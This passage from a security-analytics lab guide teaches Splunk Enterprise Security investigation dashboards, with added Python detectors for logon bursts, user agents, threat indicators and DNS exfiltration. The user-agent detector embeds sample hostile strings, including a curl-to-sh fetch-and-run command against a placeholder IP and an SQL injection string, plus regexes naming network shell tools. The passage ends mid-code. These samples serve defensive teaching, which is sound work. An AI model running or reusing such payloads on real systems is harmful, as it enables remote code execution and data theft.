93. From the Intrusion Search window, click Export then select Export PDF.
94. Close the Intrusion Search window.
95. From your investigation, add a new note called Intrusion Search as Source, select the Show on
timeline checkbox, and use the file attachment option to add the exported Intrusion Search PDF
document. Click Add to investigation.
Note: If the filename contains underscore characters or other non-supported characters, the Change
file name window appears. Click the Replace not supported characters with "-" button and click
Change.
96. Close the Investigation notes and Quick Search windows.

Task 9: Review your investigation from Timeline and Summary views.

97. Click Investigations and open the Snort Activity investigation.


98. Select Timeline and toggle between List and Slide views to review all of the entries you created during
the investigation.
Tip: with the above information, you can work with your network administrators to eliminate the
snooping attacks.
Any physical actions can also be logged in the timeline, as well as scans of any pertinent documents,
copies of files, etc.
99. For a higher-level view of your investigation, navigate to the Summary view.

Module 5 Lab – Forensic Investigation
Description
In this lab exercise, you will use some of the forensic dashboards to investigate activity in your environment.
First, you will dive into some more of Hax0r’s activities in the Access domain. Then you will do an investigation
into some network traffic anomalies. Finally, you will look into some malware issues in the Endpoint domain.

Steps
Scenario: Follow up on the Hax0r incident.

Task 1: Use the Access Domain.

1. Navigate to Incident Review and search for Hax0r.


2. Expand and view the details of a Hax0r incident in the Identity Security Domain.
3. Open the Action menu for the User field and note the options available.
4. Select Access Search and a new window opens, showing login attempts for Hax0r.
5. Note that all login attempts are on the same system (HOST-001) and are all failures.
6. All the attempts are using the win:local app, and the src field shows a 10.x.x.x address: the attempts
originate inside your network, not from the internet.
Let’s see how these Hax0r events fit into the overall access profile of your organization.
7. Navigate to Security Domains > Access > Access Center.
8. Notice that there are many login apps being used and that Authorization Attempts are increasing
(AUTH. ATTEMPTS Key Indicator).
9. Change the Action filter drop-down to failure, and the App filter drop-down to win:local.
10. Set the time range to Last 24 hours and click Submit.
11. Examine the access pattern in the top two panels—it is very repetitive, indicative of an automated script,
and it is happening throughout most of the day.
12. In the Access Over Time By App panel, click one of the high peaks to drill down into the activity at that
point.
Note: You will probably see activity from Hax0r, but there are others. You will add this to the Hax0r
investigation to examine how the Hax0r account information might have been exfiltrated from your
organization and who might be using it.

13. Expand one of the Hax0r events, select the Event Actions menu and click Add Event to
Investigation.
14. From the Add Event to Investigation window, click Investigation: Select… and select the Identity to
monitor: Hax0r investigation and click Save.
15. In the Add Event to Investigation window, click Open Identity to monitor: Hax0r and the Investigation
Workbench opens in a new browser tab.
16. Depending on which event you selected, you may see that the Artifacts panel was populated with more
artifacts. Explore them if you like.
Note: If you see any assets or identities of interest in your exploration, you can click them to add them
as additional artifacts for your investigation.
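The reasoning in step 11, that a tight, evenly spaced run of win:local failures looks like a script rather than a person, can be turned into a check you can run outside the dashboard. The Python below is an added example written for this guide, not Splunk or Enterprise Security code. It takes events in Authentication data-model shape, finds any user whose failures reach FAILURE_THRESHOLD inside a sliding WINDOW_SECONDS window, and reports whether the spacing between attempts is nearly constant. The sample events, the two thresholds and the regularity cut-off are assumptions made for the example.

```python
"""Sliding-window detector for repetitive failed logons.

Added example written for this guide, not Splunk or Enterprise Security
code. Events use Authentication data-model field names (_time, user, src,
dest, app, action). The thresholds and the sample events are assumptions.
"""
from collections import defaultdict
from datetime import datetime
from statistics import pstdev

FAILURE_THRESHOLD = 5    # assumption: failures inside one window that make a burst
WINDOW_SECONDS = 60      # assumption: length of the sliding window
REGULAR_GAP_STDEV = 1.0  # assumption: near-constant spacing (seconds) suggests a script


def _ev(t, user, src, dest, app, action="failure"):
    return {"_time": t, "user": user, "src": src, "dest": dest, "app": app, "action": action}


# Constructed sample, not lab data: Hax0r fails every 2 s on HOST-001 via
# win:local, bob fails in an irregular cluster, svc_backup fails slowly,
# jsmith mistypes once and then succeeds.
SAMPLE_EVENTS = [
    _ev("2021-09-20T10:00:00", "Hax0r", "10.1.2.3", "HOST-001", "win:local"),
    _ev("2021-09-20T10:00:02", "Hax0r", "10.1.2.3", "HOST-001", "win:local"),
    _ev("2021-09-20T10:00:04", "Hax0r", "10.1.2.3", "HOST-001", "win:local"),
    _ev("2021-09-20T10:00:06", "Hax0r", "10.1.2.3", "HOST-001", "win:local"),
    _ev("2021-09-20T10:00:08", "Hax0r", "10.1.2.3", "HOST-001", "win:local"),
    _ev("2021-09-20T10:00:10", "Hax0r", "10.1.2.3", "HOST-001", "win:local"),
    _ev("2021-09-20T10:10:00", "bob", "10.1.5.7", "HOST-002", "sshd"),
    _ev("2021-09-20T10:10:01", "bob", "10.1.5.7", "HOST-002", "sshd"),
    _ev("2021-09-20T10:10:09", "bob", "10.1.5.7", "HOST-002", "sshd"),
    _ev("2021-09-20T10:10:12", "bob", "10.1.5.7", "HOST-002", "sshd"),
    _ev("2021-09-20T10:10:40", "bob", "10.1.5.7", "HOST-002", "sshd"),
    _ev("2021-09-20T10:20:00", "svc_backup", "10.1.9.9", "HOST-003", "sshd"),
    _ev("2021-09-20T10:22:00", "svc_backup", "10.1.9.9", "HOST-003", "sshd"),
    _ev("2021-09-20T10:24:00", "svc_backup", "10.1.9.9", "HOST-003", "sshd"),
    _ev("2021-09-20T10:26:00", "svc_backup", "10.1.9.9", "HOST-003", "sshd"),
    _ev("2021-09-20T10:28:00", "svc_backup", "10.1.9.9", "HOST-003", "sshd"),
    _ev("2021-09-20T10:30:00", "jsmith", "10.1.4.4", "HOST-001", "win:local"),
    _ev("2021-09-20T10:30:05", "jsmith", "10.1.4.4", "HOST-001", "win:local", "success"),
]


def _epoch(event):
    return datetime.fromisoformat(event["_time"]).timestamp()


def find_failure_bursts(events, threshold=FAILURE_THRESHOLD, window=WINDOW_SECONDS):
    """One finding per user whose failures reach `threshold` inside any
    `window`-second span; the densest span is reported. Successes are ignored."""
    by_user = defaultdict(list)
    for e in events:
        if e.get("action") == "failure":
            by_user[e["user"]].append(e)

    findings = {}
    for user, evs in by_user.items():
        evs.sort(key=_epoch)
        times = [_epoch(e) for e in evs]
        best = None                       # (start_idx, end_idx, count)
        start = 0
        for end in range(len(evs)):
            while times[end] - times[start] > window:
                start += 1                # slide the window forward
            count = end - start + 1
            if count >= threshold and (best is None or count > best[2]):
                best = (start, end, count)
        if best is None:
            continue
        lo, hi, count = best
        burst = evs[lo:hi + 1]
        gaps = [times[i + 1] - times[i] for i in range(lo, hi)]
        findings[user] = {
            "count": count,
            "first": burst[0]["_time"],
            "last": burst[-1]["_time"],
            "src": sorted({x["src"] for x in burst}),
            "dest": sorted({x["dest"] for x in burst}),
            "app": sorted({x["app"] for x in burst}),
            # evenly spaced attempts are what a script, not a person, produces
            "scripted": len(gaps) > 1 and pstdev(gaps) <= REGULAR_GAP_STDEV,
        }
    return findings


if __name__ == "__main__":
    for user, finding in find_failure_bursts(SAMPLE_EVENTS).items():
        print(user, finding)
```

Run as-is and Hax0r is reported as a scripted burst of six win:local failures against HOST-001, bob as a burst that is not scripted, and svc_backup is not reported because five failures spread over eight minutes never fit in one 60-second window.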

Scenario: Examine the target server of the Hax0r attack to identify malicious software.

Task 2: Use the Malware Search and Center dashboards.

17. In ES, navigate to Security Domains > Endpoint > Malware Search.
18. In the Signature field, enter Mal*, in the Destination field, enter HOST-001, over the Last 4 hours and
click Submit.
Note: In the upper panel, you will see a summary of the activity on the server that has been detected
by a Sophos antivirus scanner, including the malware file name, the user ID associated with the file,
and the signature, or type of virus software.
The lower panel contains the original events, including details like the virus type and action taken.
19. Expand one of the signature = Mal/Packer raw events. Several viruses have status = “Not
cleanable”, indicating they are still active on the system.
20. From the raw event, click on Mal/Packer in the signature field to examine via search.
Mal/Packer is a common generic detection for packed (obfuscated) executables, often delivered through email-based phishing.

21. Navigate to Security Domains > Endpoint > Malware Center.


22. Examine the overall pattern of malware activity. Notice that Mal/Packer appears in the Top Infections
panel.
23. Under the Top Infections panel, click the Mal/Packer bar to see all systems affected by this malware.
Note: as you can see in the dest column, HOST-001 is not the only system affected by Mal/Packer.
Seeing this, you would probably initiate a ticket with your IT team to begin removing the malware.

Scenario: As a network analyst, one of your daily tasks is to monitor the network for vulnerabilities.
You will begin by checking on the ES Vulnerability Center to see if any new vulnerabilities
have appeared since your last check.

Task 3: Use the Vulnerability Center and Search dashboards.

24. Navigate to Security Domains > Network > Vulnerability Center. Make sure the dashboard is searching
over the Last 24 hours.
25. Examine the values in the Key Indicators—especially Total Vulnerabilities (TOTAL VULNS). They have
gone up quite a bit.
26. Examine the panel results. Note the relative number of vulnerabilities by signature (Top Vulnerabilities),
and the list of Most Vulnerable Hosts.
27. In the Top Vulnerabilities panel, locate the USN19-1: squid vulnerabilities bar.
Note: depending on your browser, the longer vulnerability names may be compressed.
If for some reason squid vulnerabilities is not in the Top Vulnerabilities panel, navigate to
Security Domains > Network > Vulnerabilities Search and, in the Signature field, search for
*squid* over the Last 24 hours.
28. Click the USN19-1: squid vulnerabilities bar in the chart to drill down into the issues for this
vulnerability type. There are potential issues with a Squid proxy server.
The Vulnerability Search dashboard opens and displays the events for this vulnerability.

The top table in the dashboard lists vulnerabilities by destination server (dest) in order of decreasing
count of vulnerability issues.

29. From the Vulnerability Search window click the dest IP value in the top row of the upper panel to drill
down into issues for the most active server.

Note: this opens a search page with events for the destination IP you selected. The search uses the
Vulnerabilities data model.
30. Expand one of the events and locate the event’s dest field.
31. Open the dest field’s Actions menu (at the right end of the field’s row) and review the selection of
available tools to continue your investigation. Scroll to see all options.
32. Select Intrusion Search (as destination). The Intrusion Search dashboard opens. Make sure the time
line is the Last 24 hours and click Submit.
Note: this dashboard shows the types of IDS events that have been generated for this server (upper
panel) and the source events (lower panel).
The signature column lists various types of attacks (trojan detection, attempted information leak,
suspicious filename detections, etc.) happening on this server. Scroll through the pages to view the
different signatures.
The src values identify the origin of the attacks.
33. In the signature column, click the name of an attack signature to drill down to its source event(s).
34. In the new search page, examine the events detected by your intrusion detection scanner.
35. Expand the time range of this search to see more events.

Scenario: The vulnerabilities you have identified so far have made you wonder what other intrusion
activity might be happening.

Task 4: Use the Intrusion Center dashboard.

36. Navigate to Security Domains > Network > Intrusion Center.


37. For IDS Type, select network.
38. Make sure the time range is Last 24 hours and click Submit.
39. Examine the values for the Key Indicators including the High Severity Network Attacks (HIGH SEV.
ATTACKS) to see if they are rising or falling.
40. Examine the summary panels, especially the pattern of Attacks Over Time By Severity and the list of
Top Attacks.
41. In the Scanning Activity (Many Attacks) chart, click the bar of the top IP address to drill down to the
Intrusion Search dashboard.
42. Scroll through the intrusion events to view the different signatures.
43. In the Signature field enter FTP:AUDIT:REP-INVALID-REPLY and remove any information in the Source
field. Click Submit. Note that invalid FTP replies are a large percentage of the overall intrusion issues.
Note: based on this signature, this vulnerability is significant. You can now initiate a ticket with your IT
department to reconfigure the FTP servers to reduce the vulnerability.

Module 6 Lab – Web Intelligence
Description
In this exercise, you will use the Web Intelligence dashboards to examine the potential issues posed by
internal threats.

Steps
Scenario: Periodically, you want to review the types of user agents accessing your HTTP resources.
The HTTP User Agent Analysis dashboard is very useful for this purpose.

Task 1: Perform HTTP User Agent analysis.

1. Navigate to Security Intelligence > Web Intelligence > HTTP User Agent Analysis.
2. Set the Standard Deviation Index selector to All and make sure the search range for the dashboard is
Last 24 hours.
3. Submit the search.
4. Examine the Key Indicators showing statistics about user agent (UA) string length.
Note: very short or very long UA strings can be a sign of malicious intent.
5. Examine the scatter chart in the User Agent Distribution panel. This chart shows the count for each user
agent. Scroll over the top few user agents for details.
6. Note that the User Agent Details panel sorts the http_user_agent list by descending length.
7. Examine some of the longer user agent strings in the User Agent Details list, looking for embedded SQL
or shell commands (common signs of attacks).
8. Look for the string “FunWebProducts” in one of the Mozilla user agent strings. You may have to navigate
through a few pages to find it.
Hint: It usually has a length of 116 characters.

While not technically malware, this is evidence that at least some of your desktops are running adware
on their browsers that is probably not good for your network.
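Steps 4 through 8 describe three checks made by eye: unusual user agent length, embedded SQL or shell commands, and the FunWebProducts adware marker. The Python below is an added example written for this guide, not code from Splunk Enterprise Security, that runs the same three checks over a constructed set of http_user_agent values. The Standard Deviation Index is assumed to be the z-score of the string length against the population; the regex list, the adware marker list and the sample strings are illustrative assumptions, not the dashboard's own rules.

```python
"""User-agent triage: length outliers plus embedded SQL or shell fragments.

Added example written for this guide, not code from Splunk Enterprise
Security. The Standard Deviation Index is assumed to be the z-score of the
UA length; the regexes, the adware marker list and the sample strings are
illustrative assumptions rather than the dashboard's own rules.
"""
import re
from statistics import mean, pstdev

SDI_THRESHOLD = 2.0  # assumption: |z-score| of length at which a UA is an outlier

# Illustrative fragments seen in hostile UA headers (assumption, not a complete list).
SQL_SHELL_PATTERNS = [
    r"(?i)\bunion\b.*\bselect\b",
    r"(?i)\bselect\b.+\bfrom\b",
    r"(?i)\bor\s+1\s*=\s*1\b",
    r"(?i)'\s*(?:or|and)\s+'",
    r"\$\(|`[^`]+`",                          # $(...) or backtick substitution
    r"(?i)\b(?:wget|curl|nc|bash|sh)\b\s+-",  # fetch/execute tool with flags
    r";\s*(?:rm|cat|chmod|nc|bash)\b",        # chained shell commands
]
ADWARE_MARKERS = ["FunWebProducts"]  # the adware marker named in the lab text

# Constructed sample. Common browsers are repeated to mimic real traffic;
# the last four entries are the ones the checks should surface.
CHROME_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
FIREFOX_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0"
IPHONE_UA = "Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1"
EDGE_UA = CHROME_UA + " Edg/93.0.961.52"
LINUX_UA = "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
ADWARE_UA = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727)"
SQLI_UA = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1) ' UNION SELECT username, password FROM users -- "
SHELL_UA = "Mozilla/5.0 $(curl -s http://203.0.113.5/a.sh | sh)"
DASH_UA = "-"  # what many web servers log when the header is absent
SAMPLE_UAS = [CHROME_UA, FIREFOX_UA, IPHONE_UA, EDGE_UA, LINUX_UA] * 4 + [ADWARE_UA, SQLI_UA, SHELL_UA, DASH_UA]


def ua_length_stats(uas):
    """Population statistics of UA length, the dashboard's key indicators."""
    lengths = [len(u) for u in uas]
    return {"count": len(lengths), "mean": mean(lengths), "stdev": pstdev(lengths),
            "min": min(lengths), "max": max(lengths)}


def std_dev_index(ua, stats):
    """z-score of this UA's length against the population (assumed SDI)."""
    if stats["stdev"] == 0:
        return 0.0
    return (len(ua) - stats["mean"]) / stats["stdev"]


def suspicious_fragments(ua):
    return [p for p in SQL_SHELL_PATTERNS if re.search(p, ua)]


def adware_markers(ua):
    return [m for m in ADWARE_MARKERS if m in ua]


def triage(uas, sdi_threshold=SDI_THRESHOLD):
    """Flagged UAs, longest first, like the User Agent Details panel."""
    stats = ua_length_stats(uas)
    findings = []
    for ua in sorted(set(uas), key=len, reverse=True):
        sdi = std_dev_index(ua, stats)
        frags = suspicious_fragments(ua)
        adware = adware_markers(ua)
        if abs(sdi) >= sdi_threshold or frags or adware:
            findings.append({"user_agent": ua, "length": len(ua), "sdi": round(sdi, 2),
                             "patterns": frags, "adware": adware})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_UAS):
        print(f["length"], f["sdi"], f["patterns"] or f["adware"] or "length outlier", f["user_agent"][:60])
```

On this sample the SQL and shell strings are flagged by pattern regardless of their length, the bare "-" is flagged only because its length sits well below the mean, and the FunWebProducts string is flagged only by the adware marker, which is the entry the per-panel filter in the next task removes from view.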

Scenario: You have decided that “FunWebProducts” is not a threat and you would like to eliminate it
from the list of user agents. Your administrator has given the analyst role the capability to
use the per-panel filter tool.

Task 2: Use a per-panel filter.

9. Select the checkbox in the User Agent Details panel for the Mozilla “FunWebProducts” entry and click
the Per-panel Filter button.
10. Make sure Filter out these results... is selected and click Save.
11. Confirm the “FunWebProducts” entry is no longer displayed in the panels.

Scenario: Examine the web site categories users are accessing.

Task 3: Use the HTTP Category Analysis dashboard.

12. Navigate to Security Intelligence > Web Intelligence > HTTP Category Analysis.

The source events for this dashboard all come from one sample server and one sample user, so the
scatter chart shows a flat profile.
13. Examine some of the categories displayed in the lower panel. Sort this panel descending by count.
Many of these categories are uninteresting and could be excluded by filtering. However, some
categories, such as weapons, drugs, etc., may be cause for concern.
14. Locate a questionable category, such as weapons or drugs, and drill down.
15. You will see that the source events are from the Web data model.
16. Expand the details of one of the events.
17. Examine the fields available, such as dest, src, user, url, etc.
All of this data could be important if launching an investigation of inappropriate user behavior. You can
use one of these events to create an incident.
18. From the Event Actions menu, select Create notable event. Populate the form as follows:
Title: Inappropriate website access
Security Domain: Audit
Urgency: Medium
Owner: Unassigned
Status: Unassigned
Description: Investigate user access to this suspicious website.
19. Click Save. Your new incident displays on the Incident Review dashboard. (You may need to refresh for
the new notable to appear.)
This can be the initiation of an investigation into the user’s activities.

Module 7 Lab – User Intelligence
Description
In this lab exercise, you will use the dashboards in the User Intelligence menu to examine the potential issues
posed by internal threats.

Steps
Scenario: You are continuing your investigation into the incidents from the preceding exercise. You
want to find out more about the assets and identities involved.

Task 1: Examine and learn more about the Hax0r user account.

1. Navigate to Security Intelligence > User Intelligence > Identity Investigator.


2. Enter Hax0r in the search field, set the time range (under the list of swimlanes) to Last 24 hours, and click
Search.
3. Examine the events in the All Authentication swim lane and notice that Hax0r has been attempting to log
in quite frequently. (A darker bar means more events in that time period.)
4. Use the pan/zoom controls at the bottom of the swim lanes to zoom in on the time just before and after the
last notable event to make it easier to see the pattern of logon events in the All Authentication swim lane.
5. Notice that the authentication events come in bursts, with many attempts in a very short time frame.
6. Click the bars in the All Authentication swim lane to see the event details on the right. Note fields like the
src, dest, user, action and number of events.
The action is failure, indicating a failed login.
7. Make a note of the dest field value (HOST-001).

In the details side bar, there are options to drill down into the source events, share this result,
or create a notable event.
8. Click a bar in the Notable Events swim lane to see the details of the notable event generated.

Task 2: Investigate the server that Hax0r is attempting to access.

9. Navigate to Security Intelligence > User Intelligence > Asset Investigator.


10. On the Asset Investigator, enter the host name you discovered while investigating Hax0r’s activities
(HOST-001).
11. Make sure the time range is Last 24 hours and that the pan/zoom controls at bottom are expanded to the
full length of the time range.
12. ES displays the details for HOST-001. This information is pulled from the Assets managed lookup file.
13. Examine the details of some of the events in the different swim lanes including All Changes, Malware
Attacks, Notable Events, and Risk Modifiers. These events are focused on HOST-001. However, the All
Authentication swimlane displays any event where HOST-001 is present.

Scenario: After working with the Hax0r incident, you want to get an overview of user activity in your
environment to check for insider threats.

Task 3: Use the User Activity and Access Anomalies dashboards.

14. Navigate to Security Intelligence > User Intelligence > User Activity.
15. By default, the dashboard shows all user activity over the last 24 hours. Examine the Key Indicator
values.
16. Some users have elevated Risk Scores. Examine the users in the Non-corporate Email Activity and
Non-corporate Web Uploads panels. This could indicate dangerous activity by these users.
17. Select the user admin in the Non-corporate Web Uploads panel. This opens the Identity Investigator
dashboard for the user.
Initially, the default collection of swim lanes is displayed but there is an alternative set of lanes for
investigating user activity.
18. Click the Edit icon above the list of swim lane names. Select the User Activity collection and close the
modal using the X in the upper right corner. Make sure the time range picker is set to Last 24 hours.
19. You now see many events in the Non-corporate Web Uploads swim lane. Click one of the darker bars,
indicating a large number of events in that time period.
20. Examine the details on the right: the number of events indicated, the time range, and options to share the
results or create a notable event.
21. Click the icon to open the source events in a drill down search.
This data comes from the Web data model. Some of the useful fields are src, dest, and url.
22. Close the drill down search window.

Scenario: Examine the pattern of geographic access by your users.

Task 4: Use the Access Anomalies and Access Search dashboards.

23. Navigate to Security Intelligence > User Intelligence > Access Anomalies and notice that the search
executes by default over the last 60 minutes.
24. Scroll down to Concurrent Application Accesses and note the list of anomalous access incidents.
25. Examine the app values, such as sshd.
It is not surprising to see sshd events that happen concurrently in remote locations, but login or
windows:local would be more suspicious.
26. Click on an sshd row and examine the drill down results.
27. Return to the Access Anomalies dashboard and hover your mouse over the pie charts in the map.
28. Examine the summary of event statistics.
29. Drill down on the pie charts to see more details.

Module 8 Lab – Threat Intelligence
Description
In this lab exercise, you will use the Threat Intelligence dashboards to examine the potential issues posed by
internal (user) and external threats. For an extended example of the internal threat tools, see
http://docs.splunk.com/Documentation/ES/latest/User/ThreatIntelligence.

Steps
Scenario: As a network security analyst, you want to be aware of any threat activity in your
environment.

Task 1: Review threat activity.

1. Use the Incident Review dashboard to search for all Threat domain notables in the Last 24 hours.
2. Examine the details of a few of the results.
3. You can run ad hoc searches to see what types of threats you are dealing with. Navigate to Search >
Search.
4. Execute the following search over the Last 24 hours:
`notable` | stats count by threat_source_type
You are using the `notable` macro, which searches in the notable index and then adds all incident
values such as owner, status, etc. There are both CSV and STIX sources.
CSV sources are simple threat lists of IP addresses with no additional information—all you know is
that you are connected to a malicious site. The name of the list (threat_source_id) can tell you
something about the type of threat.
STIX, on the other hand, is a detailed threat information source from a TAXII server. This allows the
Threat Activity Detected correlation search to look beyond simple IP addresses.
5. Execute the following search over the Last 24 hours:
`notable` | search threat_match_field = file_name | fields threat* dest
6. Examine the information available in these events.
This information comes from the STIX content downloaded from the TAXII server from Mandiant. This
information indicates files with names known to be associated with malware downloads.
7. In the top result event, locate the dest field and copy it to the clipboard. This is one of the servers where
a suspect file has been downloaded.
8. Navigate to Security Intelligence > Threat Intelligence > Threat Activity and notice this view shows you
all activity associated with threat intelligence over the search period (default 24 hours), not just threat
notable events.
9. Examine some of the Key Indicator values and panel contents.
10. Change the Search filter field to Destination and paste the dest field value you copied to the clipboard
earlier.
11. Click Submit. The Threat Activity Details panel now shows the specific threat sources and details
against this asset.
12. Navigate to Security Intelligence > Threat Intelligence > Threat Artifacts.
The Threat Overview panel displays a list of the threat intelligence sources—i.e., threat lists (CSV) or
advanced threat data (STIX or OpenIOC).
The other panels show a summary of artifacts (data from the threat intelligence) by type—Endpoint,
Network, Certificate, and Email.

13. Click the Network tab and review the information in the IP Intelligence panel. Notice the data includes the
IP address, location (city and country), and threat_group.
14. Review the domain data of the artifact in the Domain Intelligence panel.
15. Review the information on the Endpoint and Certificate tabs.

Task 2: Add a local IP address to the ip_intel KV Store collection.

16. Open a search bar and use the makeresults command to create a populating search for the IP address
192.168.1.95 with the phrase “payroll watch list”.
| makeresults count=1
| eval description="payroll watch list", ip="192.168.1.95", weight="1"
17. Add the data to the local_ip_intel lookup in the KV Store.
| makeresults count=1
| eval description="payroll watch list", ip="192.168.1.95", weight="1"
| outputlookup local_ip_intel append=t
18. Ensure that the IP from your search was added to the local_ip_intel lookup in the KV Store collection.
| inputlookup local_ip_intel | reverse
Note: since there are many entries in the local_ip_intel list, using the reverse command will show the
newly added entry at the top.
19. Navigate to Configure > Content > Content Management and filter on Local IP Intel.
20. Click the Local IP Intel lookup and confirm that 192.168.1.95 entry has been added to the lookup.
Note: scroll to the bottom of the list to see the new entry.
21. Click Cancel to exit.
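Task 1 reads the threat_source_type, threat_match_field and dest fields that threat matching writes onto a notable, and Task 2 appends an entry to local_ip_intel. The Python below is an added example written for this guide, not the Threat Activity Detected correlation search or any Splunk code. It matches constructed events against a constructed indicator set in the same shape (ip and file_name collections, each entry carrying threat_source_type, threat_source_id and weight), counts matches by source type the way the `notable` search above does, and then shows that an entry appended locally, like the payroll watch list address, matches like any other. The mapping of event fields to indicator types is an assumption.

```python
"""Indicator matching that produces ES-style threat_match_* fields.

Added example written for this guide, not Splunk or Enterprise Security
code. Indicators, events and the field mapping are constructed assumptions;
the output field names follow the ones visible on a Threat domain notable.
"""
import copy
from collections import Counter

# Constructed indicator collections, shaped like ip_intel / file_intel entries.
THREAT_INTEL = {
    "ip": [
        {"ip": "198.51.100.23", "description": "known C2 node", "weight": 60,
         "threat_source_type": "csv", "threat_source_id": "blocklist_ips"},
    ],
    "file_name": [
        {"file_name": "invoice_2021.exe", "description": "dropper filename", "weight": 80,
         "threat_source_type": "stix", "threat_source_id": "stix_feed"},
    ],
}

# Assumption: which event fields are compared against each indicator type.
FIELD_MAP = {"ip": ["src", "dest"], "file_name": ["file_name"]}

# Constructed events: a proxy hit on a listed IP, a download with a listed
# file name, a benign download, and the payroll host (not listed yet).
SAMPLE_EVENTS = [
    {"_time": "2021-09-20T09:12:00", "src": "10.0.0.15", "dest": "198.51.100.23", "file_name": None},
    {"_time": "2021-09-20T09:15:00", "src": "10.0.0.22", "dest": "HOST-042", "file_name": "Invoice_2021.exe"},
    {"_time": "2021-09-20T09:20:00", "src": "10.0.0.9", "dest": "192.0.2.10", "file_name": "report.pdf"},
    {"_time": "2021-09-20T09:25:00", "src": "192.168.1.95", "dest": "10.0.0.50", "file_name": None},
]


def fresh_intel():
    """A private copy of the indicator set so local additions do not leak."""
    return copy.deepcopy(THREAT_INTEL)


def _index(intel):
    """(indicator type, lower-cased value) -> indicator entries."""
    idx = {}
    for kind, indicators in intel.items():
        for ind in indicators:
            idx.setdefault((kind, str(ind[kind]).lower()), []).append(ind)
    return idx


def match_events(events, intel, field_map=FIELD_MAP):
    """Every (event field, indicator) hit, annotated with the threat_* fields."""
    idx = _index(intel)
    matches = []
    for ev in events:
        for kind, ev_fields in field_map.items():
            for field in ev_fields:
                value = ev.get(field)
                if not value:
                    continue
                for ind in idx.get((kind, str(value).lower()), []):
                    matches.append({
                        "_time": ev["_time"], "src": ev.get("src"), "dest": ev.get("dest"),
                        "threat_match_field": field, "threat_match_value": value,
                        "threat_source_type": ind["threat_source_type"],
                        "threat_source_id": ind["threat_source_id"],
                        "weight": ind["weight"], "description": ind["description"],
                    })
    return matches


def count_by_source_type(matches):
    """Equivalent of `| stats count by threat_source_type`."""
    return dict(Counter(m["threat_source_type"] for m in matches))


def add_local_ip_intel(intel, ip, description, weight=1):
    """In-memory equivalent of `| outputlookup local_ip_intel append=t`."""
    entry = {"ip": ip, "description": description, "weight": weight,
             "threat_source_type": "csv", "threat_source_id": "local_ip_intel"}
    intel["ip"].append(entry)
    return entry


if __name__ == "__main__":
    intel = fresh_intel()
    print(count_by_source_type(match_events(SAMPLE_EVENTS, intel)))
    add_local_ip_intel(intel, "192.168.1.95", "payroll watch list", 1)
    for m in match_events(SAMPLE_EVENTS, intel):
        print(m["threat_source_type"], m["threat_source_id"], m["threat_match_field"], m["threat_match_value"], m["dest"])
```

Before the local entry is added there is one csv match (the proxy destination) and one stix match (the file name, matched case-insensitively); after it there are two csv matches, the new one carrying threat_source_id local_ip_intel and threat_match_field src.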

Module 9 Lab – Protocol Intelligence
Description
In this lab exercise, you will work with the Protocol Intelligence dashboards.

Steps
Scenario: As a network security professional, you routinely monitor the status of network activity
using Protocol Intelligence.

Task 1: Use Protocol Intelligence.

1. Navigate to Security Intelligence > Protocol Intelligence > Protocol Center.


2. Examine the panel contents.
3. In the Connections by Protocol panel, click the http segment to see a report of the HTTP connections
by server.
4. Return to the Protocol Center dashboard.
5. In the Usage for Well Known Ports panel, click the dest_port value in the first row.
6. Examine details about the port in the Traffic Search dashboard, including a summary in the top panel,
and individual events in the bottom panel.
7. Expand one of the events in the bottom panel and examine the fields available for analysis.
8. Navigate to Security Intelligence > Protocol Intelligence > DNS Activity.
9. Examine the available data broken down by query sources, DNS, and domain, as well as the most recent
queries. Make sure the Time Range Picker is set to Last 24 hours.
10. In the Top DNS Queries panel, locate the Doc.exfil.ru domain name. (You may have to scroll through the
pages of results to locate it.)
This is a suspicious domain name and warrants further investigation.
11. Click Doc.exfil.ru to open a new search for this DNS query in the DNS Search dashboard.
12. Examine some of the systems (dest) making DNS queries for this domain—there seem to be a lot!
13. To investigate further, execute the following search over the Last 24 hours.
| datamodel Network_Resolution DNS search | search DNS.query=*exfil.ru
This search shows all DNS resolution queries for any servers in the exfil.ru domain.
You see many queries happening in your network—this is a possible indicator of data exfiltration
occurring.
In a real environment, you would open a new investigation immediately and add this search to it.
14. Navigate to Security Intelligence > Protocol Intelligence > SSL Activity and examine the available
data.
15. Note the breakdown of connections by common domain name, as well as recent SSL sessions showing
authentication issuer, start and end time, and validity.
16. Navigate to the Security Intelligence > Protocol Intelligence > Email Activity dashboard.
Here you see the most prolific email senders, as well as rare senders and receivers. This can be
useful to identify suspicious email activity.
17. Click one of the results under Rarely Seen Senders to open the Email Search dashboard.
You will see a report of that sender’s emails and the associated raw events.
18. Expand one of the email events to see the details collected.
19. Note that the body of the email is not collected, but the events do include a summary of the body contents
in content_body and content_transfer_encoding, such as any embedded URLs.
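The search in step 13 lists every query for *exfil.ru and leaves you to judge whether the volume and spread of hosts is worrying. The Python below is an added example written for this guide, not Splunk code, and goes one step beyond the lab search: it summarises DNS events per registered domain (queries, distinct querying hosts, distinct query names) and flags a domain where nearly every query name is unique, the profile produced when data is encoded into the left-most label. Events are constructed in Network_Resolution shape (src, dest, query); the "registered domain is the last two labels" rule and the thresholds are simplifying assumptions (a public suffix list is needed for names like co.uk).

```python
"""Per-domain DNS profile to spot tunnelling or exfiltration.

Added example written for this guide, not Splunk code. The registered-domain
rule (last two labels) and the two thresholds are assumptions; the events are
constructed in Network_Resolution shape.
"""
from collections import defaultdict

MIN_DISTINCT_QNAMES = 5  # assumption: ignore domains with too few names to judge
UNIQUE_RATIO = 0.8       # assumption: distinct names / queries that marks tunnelling


def _dns(t, src, query, dest="10.0.0.53"):
    return {"_time": t, "src": src, "dest": dest, "query": query}


# Constructed sample: eight hosts each resolve a unique hex label under
# doc.exfil.ru, two hosts resolve the bare name (one in mixed case), and the
# rest is ordinary repeated traffic.
SAMPLE_DNS = [
    _dns("2021-09-20T11:00:01", "10.0.1.11", "4d2a9f.doc.exfil.ru"),
    _dns("2021-09-20T11:00:02", "10.0.1.12", "7bc013.doc.exfil.ru"),
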